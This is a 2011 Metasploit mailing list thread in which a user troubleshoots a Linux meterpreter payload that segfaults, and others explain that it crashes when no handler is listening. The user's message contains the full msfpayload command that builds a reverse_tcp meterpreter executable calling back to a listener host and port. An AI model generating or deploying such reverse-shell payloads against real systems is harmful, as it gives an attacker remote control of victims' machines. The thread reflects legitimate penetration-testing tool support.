Metasploit mailing list archives

Re: Is Linux meterpreter broken?

From: Crypto Cracker <cryptocracker () gmail com>
Date: Wed, 15 Jun 2011 12:25:37 -0400

Yep this worked. Thanks to every1! :D

It just seemed odd that it wouldn't die nicely after connection failure like
the windoze meterpreter's.

Cheers,

On Thu, Jun 9, 2011 at 2:52 PM, <egypt () metasploit com> wrote:

Yup, Rob has it right here.  If session initiation fails (e.g. because
the handler isn't set up or there is a network issue preventing it
from getting the second stage), the payload will run off the end of
the .text section, causing a segfault.  The "corrupted header size" is
an artifact of how we build the ELF and can be safely ignored.  At
some point we'll probably revamp it a bit so it looks a little more
like a regular ELF.

Hope this helped,
egypt

On Thu, Jun 9, 2011 at 8:07 AM, Rob Fuller <mubix () room362 com> wrote:

Someone will correct me if I'm wrong, but I believe all linux based
payloads will segfault if they cannot create a connection to the
handler, so set up a multi/handler and see if it still segfaults.

--
Rob Fuller | Mubix
Certified Checkbox Unchecker
Room362.com | Hak5.org



On Thu, Jun 9, 2011 at 7:23 AM, Crypto Cracker <cryptocracker () gmail com>

wrote:

Backtrack 5 (x86, KDE) on VirtualBox 4.0.8 r71778:
root@bt:/pentest/exploits/framework3# apt-get update
Hit http://32.repository.backtrack-linux.org revolution Release.gpg
[SNIP]
Reading package lists... Done
root@bt:/pentest/exploits/framework3# apt-get upgrade
Reading package lists... Done
[SNIP]
0 upgraded, 0 newly installed, 0 to remove and 4 not upgraded.
root@bt:/pentest/exploits/framework3# uname -a
Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
root@bt:/pentest/exploits/framework3# svn up
At revision 12886.

[so everything up to date]

root@bt:/pentest/exploits/framework3# ./msfpayload
linux/x86/meterpreter/reverse_tcp LHOST=192.168.137.66 LPORT=80 X >
linux.meterpreter
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/meterpreter/reverse_tcp
 Length: 50
Options: {"LHOST"=>"192.168.137.66", "LPORT"=>"80"}
root@bt:/pentest/exploits/framework3# file linux.meterpreter
linux.meterpreter: ELF 32-bit LSB executable, Intel 80386, version 1

(SYSV),

statically linked, corrupted section header size
root@bt:/pentest/exploits/framework3#
[doh! corrupted section header size!! and of course:]
root@bt:/pentest/exploits/framework3# chmod +x linux.meterpreter
root@bt:/pentest/exploits/framework3# ./linux.meterpreter
Segmentation fault
root@bt:/pentest/exploits/framework3#

or am I doing something wrong?

Thanks a lot,

Crypto.



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

Is Linux meterpreter broken? Crypto Cracker (Jun 09)
- Re: Is Linux meterpreter broken? Rob Fuller (Jun 09)
  - Re: Is Linux meterpreter broken? Ramon de Carvalho Valle (Jun 09)
  - Re: Is Linux meterpreter broken? egypt (Jun 09)
    - Re: Is Linux meterpreter broken? Crypto Cracker (Jun 15)